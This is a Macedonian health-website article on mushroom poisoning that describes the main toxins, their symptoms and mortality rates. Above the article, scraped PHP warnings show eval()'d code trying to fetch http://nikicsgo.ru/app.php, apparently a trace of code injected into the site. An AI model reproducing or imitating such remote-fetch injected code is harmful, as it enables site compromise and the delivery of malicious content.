Мицетизам (Труење со печурки) | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

ТОКСИКОЛОГИЈА

                           
                           
                           
                       

Мицетизам (Труење со печурки)

Труењето со печурки или мицетизам настанува после ингестија (јадење) на токсични субстанци присутни во некои видови на печурки. Симптоматологијата е различна, од гастроинтестинални симптоми, па се до смрт. Токсините присутни во печурките се секундарни метаболити создадени во специфични биохемиски процеси во фунгалните клетки. Труењата со печурки обично се случуваат со ингестија на диви, т.е шумски печурки после погрешна идентификација на дивите со неотровните печурки.



За да се спречат ваквите труења, собирачите на печурки треба да бидат исклучително запознаени со видот на печурките кој го собираат, вклучително и познавање на токсичните видови кои изгледаат слично на неотровните печурки.



Причина за труењата со печурки







Од многуте илјади видови на печурки, околу 32 вида биле асоцирани со екстремна фатална токсичност, а кај 52 вида биле идентификувани специфични токсини. Досега труењата со печурки во поголем процент не се фатални. Но најголемиот број на фатални труења потекнуваат од специесот Amanita phalloides.

Најголемиот број од овие труења се направени со погрешна идентификација.



Клиничка слика



Отровните печурки содржат различни видови ан токсини. Симптомите варираат, од гастроинтестинални до животозагрозувачки кои резултираат со смрт. Сериозните симптоми не се јавуваат веднаш после ингестијата, се

додека токсините не го атакуваат

црниот дроб или бубрезите, понекогаш, денови или недели после конзумирањето. Најчестата последица од труењата е гастричната манифестација. Повеќето отровни печурки содржат гастроинтестинални иританси, кои може да предизвикаат повраќање и дијареа (која понекогаш индицира хоспитализација), но не предизвикуваат тешки оштетувања на организмот. Но секако дека постојат и голем број на отровни печурки кои предизвикуваат животозагрозувачки труења.

Такви се:


  • Alpha-amanitin (смртна, предизвикува оштетувања на црниот дроб за 1-3 дена после ингестијата) – главен токсин – Amanita;
  • Phallotoxin (гастроинтестинални пореметувања) –токсин – Amanita;
  • Orellanine (ренална инсуфициенција 3 недели после ингестијата) – токсин – Cortinarius;
  • Muscarine (понекогаш смртоносна, предизвикува респираторна инсуфициенција) – токсин – Omphalotus;
  • Gyromitrin (смртоносна, неуротоксична, гастроинтестинални пореметувања, и деструкција на крвните клетки) – токсин – Gyromitra;
  • Coprine (предизвикува болест кога се конзумира заедно со алкохол) – токсин – Coprinus;
  • Ibotenic acid и muscimol (халуциногени) – токсин – Amanita;
  • Psilocybin and psilocin (халуциногени, најчесто злоупотребувани) – токсин – Psilocybe;
  • Arabitol (гастроинтестинална иритација кај некои луѓе)
  • Ergotamine (го афектира васкуларниот систем и може да доведе до смрт) – алкалоид најден во генусот Claviceps.







Amanita spp.

Симптомите зависат од токсинот кој е инволвиран:




  • Alpha-amantin: Не се јавуваат симптоми веднаш. После 6-12часа се јавуваат симптоми од ГИТ (гастроинтестиналниот тракт) – дијареа, профузно повраќање. Овој стадиум е предизвикан примарно од фалотоксините. Симптомите траат 24часа. После тоа следи стадиум на оштетување на црниот дроб. Оштетувањето може да продолжи во наредните 2-3 дена. Може да се појави и оштетување на бубрезите. Морталитетот е помеѓу 10-15%.






  • Orellanine: Овој токсин предизвикува симптоми после 3-20 дена од ингестијата. Обично манифестацијата е од страна на бубрезите – болка во оваа регија, жед, повраќање, главоболки.






  • Muscarine: ги стимулира мускаринските рецептори на нервниот систем и мускулите – потење, солзење, прекумерна саливација, заслепен вид, палпитации, и во високи дози - респираторна инсуфициенција.






  • Gyromitrin: го болкира ГАБА-неуротрансмитерот, водејќи до ступор, делириум, мускулни крампи, губиток на координација, тремот, конвулзивни напади. Се јавуваат симптоми поради гастроинтестинална иритација – повраќање и дијареа. Во некои случаи оштетување на црниот дроб, бубрежна инсуфициенција и знаци за анемија.






  • Coprine: се метаболизира до продукт сличен на дисулфирам. Ја инхибира алдехид дехидрогеназата (ALDH), која генерално не предизвикува штета, освен ако пациентот нема алкохол во крвта додека ALDH е инхибиран. Во овој случај алкохолот неможе да биде комплетно метаболизиран што предизвикува зацрвенување на кожата, повраќање, силни главоболки, тетеравење, слабост, конфузија, палпитации и тешко дишење.






  • Ibotenic acid: Оваа органска киселина се метаболизира до мусцимол, кој дава ефекти на гадење, повраќање, конфузија, еуфорија, поспаност, губиток на мускулна координација, потење. Некои луѓе доживуваат визуелни халуцинации, чувство на сила, и делузии. Симптомите се јавуваат 30 минути по ингестијата и траат во наредните неколку часови.






  • Psilocybin: еуфорија, визуелни халуцинации од религиозна природа, и изменета перцепција, страв, агитација, конфузија и шизофреноидни симптоми. Дејството почнува кратко време по конзумацијата и трае во наредните неколку часови.






  • Arabitol: шеќерен алкохол, сличен на манитолот, кој не предизвикува оштетување, освен понекогаш гастроинтестинални тегоби.







Некои печурки содржат помалку токсини и поради тоа се релативно токсични. Труењата со ваков тип на печурки добро реагира на терапија. Но некои видови на печурки, како Аманита, содржат многу потентни токсини и се многу токсични, па дури и ако симптомите се третираат веднаш после ингестијата, морталитетот сепак е висок и смртта може да се сличи после неколку дена или недели. Иако трансплатацијата на црниот дроб или бубрезите може да помогне, во повеќето случаи нема достапни органи за трансплатација. Пациентите кои се хоспитализирани им е дадена агресивна супортивна терапија после ингестијата на амантин содржечките печурки, и тогаш морталитетот е околу 10%, освен кај оние кај што поминале 60-тина часови од ингестијата. Тогаш стапката на морталитетот е 50-90%.



Автор: За Здравје

ЗА ЗДРАВЈЕ NEWSLETTER